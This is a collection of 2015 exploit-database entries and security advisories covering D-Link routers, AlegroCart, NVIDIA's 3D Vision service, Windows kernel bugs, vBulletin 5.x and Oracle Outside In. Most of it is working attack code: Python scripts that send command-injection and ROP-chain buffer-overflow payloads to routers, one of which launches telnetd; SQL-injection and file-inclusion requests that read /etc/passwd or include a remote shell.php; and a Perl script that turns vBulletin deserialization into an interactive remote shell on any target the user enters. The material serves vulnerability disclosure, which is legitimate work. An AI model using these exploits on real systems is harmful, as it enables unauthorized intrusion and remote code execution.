<input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-601 Command injection in ping functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR601 -- Wireless N150 Home Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 1 security issue in DIR601 firmware which allows an attacker to exploit command injection in ping functionality. The user needs to be logged in. After that any attacker on wireless LAN or if mgmt interface is exposed on Internet then an internet attacker can execute the attack. Also XSRF can be used to trick administrator to exploit it.
## Details
Command injection in dir-601
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CMD_INJECTION_INPINGTEST
# Just need user to be logged in and nothing else
buf = "POST /my_cgi.cgi HTTP/1.0\r\n"
buf+="HOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nAccept-Encoding:gzip,deflate,sdch\r\nAccept-Language:en-US,en;q=0.8\r\nContent-Length:101\r\n\r\n"
buf+="request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test&admin4_user_pwd=admin2&user_type=0"+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP_ADDRESS", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities.
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DGL5500 Un-Authenticated Buffer overflow in HNAP functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DGL5500 -- Gaming Router AC1300 with StreamBoost. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 1 security issue in DGL5500 firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilitiy in hnap functionality. Does not require any authentication and can be exploited on WAN if the management interface is exposed.
## Details
# HNAP buffer oberflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Although you can access this URL unauthenticated on WAN connection which is great but need a good shellcode. buffer overflow in check_hnap_auth
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+="AAAA" #s0
buf+="\x2A\xBF\xB9\xF4" #s1 ROP 2
buf+="\x2A\xC1\x3C\x30" #s2 sleep address
buf+="DDDD" #s3
buf+="\x2A\xC0\xEB\x50" #s4 ROP 4 2AC0EB50
buf+="\x2a\xc0\xf3\xe8" # Retn address 2AC0F3E8 ROP1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # 36 bytes of gap
buf+="\x2A\xBC\xDB\xD0" # ROP 3
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_17102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website: http://alegrocart.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There is a blind SQL injection in the admin area of AlegroCart. Additionally,
there is a blind SQL injection when a customer purchases a product. Because of
a required interaction with PayPal, this injection is hard to exploit for an
attacker.
3. BLind SQL Injection (Admin)
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When viewing the list of uploaded files - or images - , the function
check_download is called. This function performs a database query with the
unsanitized name of the file. Because of this, an attacker can upload a file
containing SQL code in its name, which will be executed once files are listed.
Note that a similar function - check_filename - is called when deleting a file,
making it likely that this operation is vulnerable as well.
Admin credentials are required to exploit this issue.
Proof of Concept
POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16690383031191084421650661794
Content-Length: 865
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"
test
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -"
Content-Type: image/jpeg
img
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="mask"
11953405959037.jpg
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="remaining"
1
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"
f396df6c76265de943be163e9b65878a
-----------------------------16690383031191084421650661794--
Visiting
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download
will trigger the injected code.
Code
/upload/admin2/model/products/model_admin_download.php
function check_download($filename){
$result = $this->database->getRow("select * from download where filename = '".$filename."'");
return $result;
}
function check_filename($filename){
$results = $this->database->getRows("select filename from download where filename = '" . $filename . "'");
return $results;
}
/upload/admin2/controller/download.php
function checkFiles() {
$files=glob(DIR_DOWNLOAD.'*.*');
if (!$files) { return; }
foreach ($files as $file) {
$pattern='/\.('.implode('|',$this->prohibited_types).')$/';
$filename=basename($file);
if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) {
$result = $this->modelDownload->check_download($filename);
if (!$result) { $this->init($filename); }
}
}
}
4. BLind SQL Injection (Customer)
CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is an SQL Injection when using Paypal as a payment method during
checkout.
Please note that this injection requires that a successful interaction with
Paypal took place. For test purposes, we commented out the parts of the code
that actually perform this interaction with Paypal.
Proof of Concept
1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation"
3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION. Note that this requires a valid paypal tx token.
The injection can be exploited blind:
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23)
However, this is rather unpractical, especially considering the need for a
valid PayPal token for each request.
It is also possible with this injection to inject into an UPDATE statement in
update_order_status_paidunconfirmed. The problem here is that it is difficult
to create an injection that exploits the UPDATE statement, but also results in
an order_id being returned by the previous SELECT statement.
It may also be possible to use the order_id that can be controlled via the
SELECT statement to inject into the INSERT statement in update_order_history.
But again, it is difficult to craft a query that does this, but also returns a
valid result for the UPDATE query.
Code
/upload/catalog/extension/payment/paypal.php:
function orderUpdate($status = 'final_order_status', $override = 0) {
//Find the paid_unconfirmed status id
$results = $this->getOrderStatusId('order_status_paid_unconfirmed');
$paidUnconfirmedStatusId = $results?$results:0;
//Find the final order status id
$results = $this->getOrderStatusId($status);
$finalStatusId = $results?$results:0;
$reference = $this->request->get('ref');
//Get Order Id
$res = $this->modelPayment->get_order_id($reference);
$order_id = $res['order_id'];
//Update order only if state in paid unconfirmed OR override is set
if ($order_id) {
if ($override) {
// Update order status
$result = $this->modelPayment->update_order_status_override($finalStatusId,$reference);
// Update order_history
if ($result) {
$this->modelPayment->update_order_history($order_id, $finalStatusId, 'override');
}
} else {
// Update order status only if status is currently paid_unconfirmed
$result = $this->modelPayment->update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId);
// Update order_history
if ($result) {
$this->modelPayment->update_order_history($order_id, $finalStatusId, 'PDT/IPN');
}
}
}
}
/upload/catalog/model/payment/model_payment.php:
function get_order_id($reference){
$result = $this->database->getrow("select `order_id` from `order` where `reference` = '" . $reference . "'");
return $result;
}
function update_order_history($order_id, $finalStatusId,$comment){
$this->database->query("insert into `order_history` set `order_id` = '" . $order_id . "', `order_status_id` = '" . $finalStatusId . "', `date_added` = now(), `notify` = '0', `comment` = '" . $comment . "'");
}
function update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId){
$result = $this->database->countAffected($this->database->query("update `order` set `order_status_id` = '" . $finalStatusId . "' where `reference` = '" . $reference . "' and order_status_id = '" . $paidUnconfirmedStatusId . "'"));
return $result;
}
5. Solution
To mitigate this issue please apply this patch:
http://forum.alegrocart.com/download/file.php?id=1040
Please note that a newer version might already be available.
6. Report Timeline
09/29/2015 Informed Vendor about Issue
17/10/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-SQL-Injection-104.html
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_22102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1047
Vendor Website: http://alegrocart.com/
Vulnerability Type: LFI/RFI
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When retrieving logs, there are no checks on the given file_path Parameter.
Because of this, local or remote files can be included, which are then executed
or printed.
Admin credentials are required to view logs.
3. Proof of Concept
Remote File:
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222
Content-Length: 441
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="directory"
error_log
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="file_path"
http://localhost/shell.php
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"
0
-----------------------------16809437203643590021165278222--
Local File:
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222
Content-Length: 425
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="directory"
error_log
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="file_path"
/etc/passwd
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"
0
-----------------------------16809437203643590021165278222--
For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack
strings were still working:
http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/
/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd
4. Code
/ upload/admin2/controller/report_logs.php
function get_file(){
$file = '';
if($this->request->gethtml('file_path', 'post')){
$file = file_get_contents($this->request->gethtml('file_path', 'post'));
}
if($this->request->gethtml('decrytion', 'post')){
$file = $this->ccvalidation->deCrypt($file, $this->config->get('config_token'));
}
if($file){
$file = str_replace(array("\r\n", "\r", "\n"),'<br>', $file);
}
return $file;
}
5. Solution
To mitigate this issue please apply this patch:
TODO
Please note that a newer version might already be available.
6.. Report Timeline
09/29/2015 Informed Vendor about Issue
11/03/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html
Source: https://code.google.com/p/google-security-research/issues/detail?id=515
NVIDIA: Stereoscopic 3D Driver Service Arbitrary Run Key Creation
Platform: Windows, NVIDIA Service Version 7.17.13.5382
Class: Elevation of Privilege, Remote Code Execution
Summary:
The 3D Vision service nvSCPAPISvr.exe installed as part of typical driver installations runs at Local System and has an insecure named pipe server. One of the commands in the server can be used to set an Explorer Run key for the system which would allow a user to get code executing in the session of any other user who logs on to the same machine leading to elevation of privilege. In Windows Domain environments it would also be possible to exploit the vulnerability between machines if the attacker has access to a valid user account on one domain joined machine.
Description:
The NVIDIA Stereoscopic 3D Driver Service exposes the named pipe “stereosvrpipe” which implements a simple command response service. One of the commands (number 2) will write an arbitrary value to a fixed set of two registry keys, one which is specific to NVIDIA (no effort has been made to determine if this could be abused) and also the HKEY_LOCAL_MACHINE explorer Run key. This Run key is inspected when a new copy of the Windows Explorer shell is started, any values are treated as command lines to execute. Therefore any user on the system can create an arbitrary run key entry and get their own commands to execute in the security context of any other user (such as an administrator) who logs into the system to interact with the desktop.
The named pipe is not locked down to prevent abuse, in fact it’s given a NULL DACL which means that any user can open the device, although it can’t be exploited from typical application sandboxes such as Chrome or IE. When the pipe is created no attempt is made to prevent remote access to the pipe (by passing the PIPE_REJECT_REMOTE_CLIENTS) flag. This means that the service can also be exposed to external systems, assuming the client has valid credentials (or is running within a session which can use Integrated Authentication). This is probably most dangerous in a Windows Domain Environment.
Finally the service has a potentially memory corruption issue when handling the registry key path. When reading a string from the named pipe the code doesn’t ensure the string is NUL terminated. Instead it’s passed to a function to verify that the path is prefixed with one of the valid registry keys. The code for this check is roughly:
BOOLEAN is_string_prefixed(char *read_str, char *prefix)
{
int ret = FALSE;
int prefix_len = strlen(prefix);
if ( read_str && strlen(read_str) >= prefix_len )
{
char old_char = read_str[prefix_len];
read_str[prefix_len] = 0;
if ( !_strnicmp(read_str, prefix, prefix_len) )
ret = TRUE;
read_str[prefix_len] = old_char;
}
return ret;
}
If the passed string is not NUL terminated then this code will cause temporary memory corruption. For example if the passed string is exactly the same size as the prefix then the code will write the 0 one character off the end of the allocated buffer. Also if the read string’s size is less than the length of the prefix but the original allocation has non NUL data the zero could be written into another valid block. As the function restores the original value it’s unlikely to be reliably exploitable. However there’s actually no reason to do the overwrite as the code is already using strnicmp which will only check up to the prefix size.
In summary there are at least 4 issues with the service:
1) Service exposes the ability to create an arbitrary system wide run key entry
2) When creating the named pipe the PIPE_REJECT_REMOTE_CLIENTS is not passed meaning it can be connected to remotely to exploit the vulnerability.
3) The pipe has a NULL DACL which allows any user to connect to it
4) The processing of the registry key path has potential for memory corruption.
Proof of Concept:
I’ve provided a proof of concept, in C# which will need to be compiled. You can use the csc compiler which comes with the .NET framework.
Expected Result:
The pipe service can't be connected to or it doesn't write the registry key.
Observed Result:
A new run key is present in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which executes notepad (note on 64bit systems it will actually be under the Wow6432Node as the service is 32bit, but it will still execute).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38792.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=509
The attached testcase crashes Window 7 32-bit with Special Pool enabled on win32k.sys due to a use-after-free condition. The bug appears to be a race condition between two threads and multiple runs on the PoC might be required to trigger the bug. This is more reliable on systems with multiple cores.
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38795.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=510
The attached poc crashes 32-bit Windows 7 with a screen resolution of 1024x768 and 32bit color depth. The crash occurs during a memmove opperation while copying the cursor content from unmapped memory. This could potentially be used by an attacker to leak kernel memory.
When reproducing this issue in VMWare, it is necessary to remove VMWare tools. In QEMU the issue reproduces reliably.
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38794.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=516
The attached testcase crashes Windows 7 32-bit due to a pool buffer overflow in an ioctl handler. Enabling special on ndis.sys netio.sys and ntoskrnl helps to track down the issue, however it will crashes due to a bad pool header without special pool as well.
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38793.zip
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
$source=$response->decoded_content;
if (($source =~ m/4276158464/i))
{
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
$user=$response->decoded_content;
chomp($user);
print "\n Target Vulnerable ;)\n";
while($cmd=="exit")
{
print "\n\n$user\$ ";
$cmd=<STDIN>;
chomp($cmd);
if($cmd =~ m/exit/i){exit 0;}
$len=length($cmd);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
print "\n".$response->decoded_content;
}
}else{print "\ntarget is not Vulnerable\n\n"}
#####################################################################################
Application: Oracle Outside In
Platforms: Windows
Versions: 8.5.2
CVE: CVE-2015-4878
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
(http://www.oracle.com/us/technologies/embedded/025613.htm)
#####################################################################################
============================
2) Report Timeline
============================
2015-06-09: Francis Provencher of COSIG found the issue;
2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
2015-10-18: Oracle release a patch for this issue;
#####################################################################################
============================
3) Technical details
============================
A Use-After-Free memory corruption occured when Outside In decode (JBIG2Decode) a stream with an invalid image.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-003.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38789.zip
###############################################################################